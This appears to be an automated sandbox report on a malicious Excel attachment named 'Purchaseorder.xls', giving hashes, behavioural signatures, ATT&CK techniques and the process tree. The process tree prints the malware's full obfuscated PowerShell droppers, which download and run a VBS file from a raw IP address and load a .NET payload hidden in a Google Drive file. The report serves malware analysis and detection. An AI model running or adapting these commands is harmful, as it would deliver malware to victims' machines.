c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
25-10-2024 17:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Purchaseorder.xls
Size

1.0MB
MD5

a8e1c0126304e8d65c0a30873dc3d830
SHA1

a0b52e51d227a126c1bc85b057482a58b028ed88
SHA256

c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b
SHA512

87ec45bd80a0b29c11900946b892134a636b6806ca87b9bce7fbbc52bfbd680436f73c61b6ce51a661b2b179cdf18577617267b68aab43a5f0f425e217f443cd
SSDEEP

12288:0mzHJEyfN1YpuBPP39sZEVD3DERnLRmF8DCO9auag9riz5+w3Z6VM0f3kobnY1lR:Hhfgp83hVbARM8+wa5ESZUF8nN

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	2816	mshta.exe
11	2816	mshta.exe
13	2772	pOweRSheLl.ExE
15	2172	powershell.exe
17	2172	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2076	powershell.exe
2172	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2772	pOweRSheLl.ExE
840	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	pOweRSheLl.ExE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOweRSheLl.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2416	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2772	pOweRSheLl.ExE
840	powershell.exe
2772	pOweRSheLl.ExE
2772	pOweRSheLl.ExE
2076	powershell.exe
2172	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	pOweRSheLl.ExE
Token: SeDebugPrivilege	840	powershell.exe
Token: SeDebugPrivilege	2076	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2416	EXCEL.EXE
2416	EXCEL.EXE
2416	EXCEL.EXE
2416	EXCEL.EXE
2416	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2816 wrote to memory of 2772	2816	mshta.exe	32
PID 2816 wrote to memory of 2772	2816	mshta.exe	32
PID 2816 wrote to memory of 2772	2816	mshta.exe	32
PID 2816 wrote to memory of 2772	2816	mshta.exe	32
PID 2772 wrote to memory of 840	2772	pOweRSheLl.ExE	34
PID 2772 wrote to memory of 840	2772	pOweRSheLl.ExE	34
PID 2772 wrote to memory of 840	2772	pOweRSheLl.ExE	34
PID 2772 wrote to memory of 840	2772	pOweRSheLl.ExE	34
PID 2772 wrote to memory of 1716	2772	pOweRSheLl.ExE	35
PID 2772 wrote to memory of 1716	2772	pOweRSheLl.ExE	35
PID 2772 wrote to memory of 1716	2772	pOweRSheLl.ExE	35
PID 2772 wrote to memory of 1716	2772	pOweRSheLl.ExE	35
PID 1716 wrote to memory of 1104	1716	csc.exe	36
PID 1716 wrote to memory of 1104	1716	csc.exe	36
PID 1716 wrote to memory of 1104	1716	csc.exe	36
PID 1716 wrote to memory of 1104	1716	csc.exe	36
PID 2772 wrote to memory of 2032	2772	pOweRSheLl.ExE	38
PID 2772 wrote to memory of 2032	2772	pOweRSheLl.ExE	38
PID 2772 wrote to memory of 2032	2772	pOweRSheLl.ExE	38
PID 2772 wrote to memory of 2032	2772	pOweRSheLl.ExE	38
PID 2032 wrote to memory of 2076	2032	WScript.exe	39
PID 2032 wrote to memory of 2076	2032	WScript.exe	39
PID 2032 wrote to memory of 2076	2032	WScript.exe	39
PID 2032 wrote to memory of 2076	2032	WScript.exe	39
PID 2076 wrote to memory of 2172	2076	powershell.exe	41
PID 2076 wrote to memory of 2172	2076	powershell.exe	41
PID 2076 wrote to memory of 2172	2076	powershell.exe	41
PID 2076 wrote to memory of 2172	2076	powershell.exe	41

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Purchaseorder.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2416

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2816
- C:\Windows\SysWOW64\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE
  "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:840
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ui40ppz4.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1716
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB00E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB00D.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1104
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2032
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2076
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2172

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
aad4ff7a03cab722bb603a8584ea4157

SHA1
29e9084f8b71fc232cfcd7297fe48ffa1d050285

SHA256
f77b61698d49e6657230581a34d8ecc0682cb1c6ccfe28d44c2ce5812c3523b7

SHA512
39428f16b563291915b207b19d8f2134a25efef76bf90e031785ea96682618bd064b73b8cb7f405377b4653a7cf8457a08650e9cd32612d4b8e9a0a1d768913e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
e3361bcd475a5c17385833c98a90a997

SHA1
a1828f33b4aeb25686396345a371035108626211

SHA256
c9e2dd6460fc5b22d5bce14ab23e9cd5fe1302d1862553ac745c290e1dd2a96d

SHA512
fc7fc7ce06ffd1c6c346876404cc2a27df65115c54af577481d74c4c71b46cba4b76e9777d2768282019bbe59c77ddc225e2e3f34580c46a5d5c27b6aa34f9d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\greatthingswithgoodnewsgivenbygodthingsgreat[1].hta

Filesize
8KB

MD5
7e03ce8476337538cce2cccba946dfd2

SHA1
3cd8b05d8be3e1d518069a6acd8e4dbbc857240e

SHA256
03f691a8f268670249f250d4ace8fa3e78fe7a79964ffbf601a2d74adde9f072

SHA512
3cf63555f7a4b620862458701d2272048517a7660ef95a8304a6ab43f452ecaa6c51cbd1b347e896c48edd2390015a7233160babc128bd129d944b69284f854e

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA7E3.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB00E.tmp

Filesize
1KB

MD5
1358e664c3dddeebe34aa6fb21cedd76

SHA1
c5804ef5f8a0175126337ed2a5a8208c88fe1179

SHA256
21b3c4e48c1e802edf20acc4b131970b7229717fb965bcb1240284daee3e9b28

SHA512
5f1b8832bfff7ab3715c49eb5a4f44d9c3c82e5a7f320e5934c0e8c6ee7eb3f6995afcd228ac0c1b709c27a9f0c4b5912cd108d8ef462560cf7a28be5c5d92c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ui40ppz4.dll

Filesize
3KB

MD5
762f8e860bb25ce122a59a3a3614dd33

SHA1
07f535d7907b8f503f634a4db038846a2fdb3466

SHA256
003a8e44a16cb5fceb1e48b8572b1bf2cb69c59375f211e78dc61f3692f0184d

SHA512
abb5971b5d63ca2c090e10428651f20653ad98078ee3d12a33954d78b481c0ac1f1f339891687597cb768406ae81d79d4b2dc2dcf9c41087f34d9c70f2196e11

Download Submit
C:\Users\Admin\AppData\Local\Temp\ui40ppz4.pdb

Filesize
7KB

MD5
f50805dcf82783a72d49358980b04fe1

SHA1
5c2bad4b78e208c1a41244b86bd80dc2f0b9e164

SHA256
1151de94483adfde9e39ba10e0c088965bba37e82211f6914eeb5f622f357a0f

SHA512
b2b84ed942a0ff8aba3bde6e40aa13771ea180718f87bfd4f64a17d60a8b495366b5cf38fd42f8f7897330e997ad6a1ea3882c0ea7250c20ace7d4c71c961545

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
57c96ee19e5400e2daf26bea0bbf4ff6

SHA1
24a3460f88078e916ae3035169b54348dd1c6eed

SHA256
a8f2ff121ff7afcbb242c78155a75c80c0ac4820d7a75d25a8171f33b53e5900

SHA512
039911383f2a32f61cb091a04dcc15741803c13d65d09267b132e6b76c1e79bf59cfe15b98e14b7b136947e57fa75a66d77259f7219c55637fddbdc5a14b0aa6

Download Submit
C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS

Filesize
136KB

MD5
74339d80989d10693dbc1115d1cf3eb4

SHA1
bd9b4dea8d68db3261e4eb23a9dfe857d0f9ee44

SHA256
a73c93345d81b888fe37255abc545dcdb3470b4f0bd59654e4b398c87be6b64d

SHA512
4befe3383549fb2048e9617430b284f8b62cce46fa4998a62122e7ed4349357ad9b11c0a0819c40467ce3b2ca7648222b1714e3745a4e74f50fae3d569caa1ba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB00D.tmp

Filesize
652B

MD5
19f85288ceb65149d468acd442cc71a6

SHA1
693e464b8bffc98b9ae952ce460e3bb61c1b423b

SHA256
ab5c6c9bb3fa418be0e2a44a6af8e3715025ceaeea32636efe2099db94b07923

SHA512
467df2e133f58e076e5175b2055a9ad862a753dccc53468c94d13fc6e19dc7bf82a4afc03ed2975175546c6d07fbe4244299af4728afd5a2aecfa252fa2c9a0a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ui40ppz4.0.cs

Filesize
480B

MD5
ce22e90871744b25a04ac8c5691f49cc

SHA1
bc0a93c1fe61e00daa34774994b638d19f735228

SHA256
3b955e3c74519870aacef3876b7cdc4420f0b77d2d09937b7385e8b578f26546

SHA512
5f13af44f2219d050d04658808b287bcb9c948765a1aca148ab148e0981087ab22d6b5af9fa74360b41a7322b9009858cf25e480a579b16fc8bd62c9b72d0f88

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ui40ppz4.cmdline

Filesize
309B

MD5
ec196e4e05abe1404e7173fa159661a7

SHA1
0bf6a7542864664c3a3c8624718d8d281c9cb5e7

SHA256
23063f317ddf7610735e3e7bcf92230e10fda9ab8bd290139aef161c95d764e7

SHA512
c870bc28bb309390c86e03befc9b114217e5d790bfd5ed0d2b9f433f5b692fdf5cefc585c7362c63780ea90bf884b4af01dcb16a3ab3825d8034b05aa058998b

Download Submit
memory/2416-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2416-1-0x000000007280D000-0x0000000072818000-memory.dmp

Filesize
44KB

Download
memory/2416-17-0x0000000002450000-0x0000000002452000-memory.dmp

Filesize
8KB

Download
memory/2416-68-0x000000007280D000-0x0000000072818000-memory.dmp

Filesize
44KB

Download
memory/2816-16-0x0000000000F90000-0x0000000000F92000-memory.dmp

Filesize
8KB

Download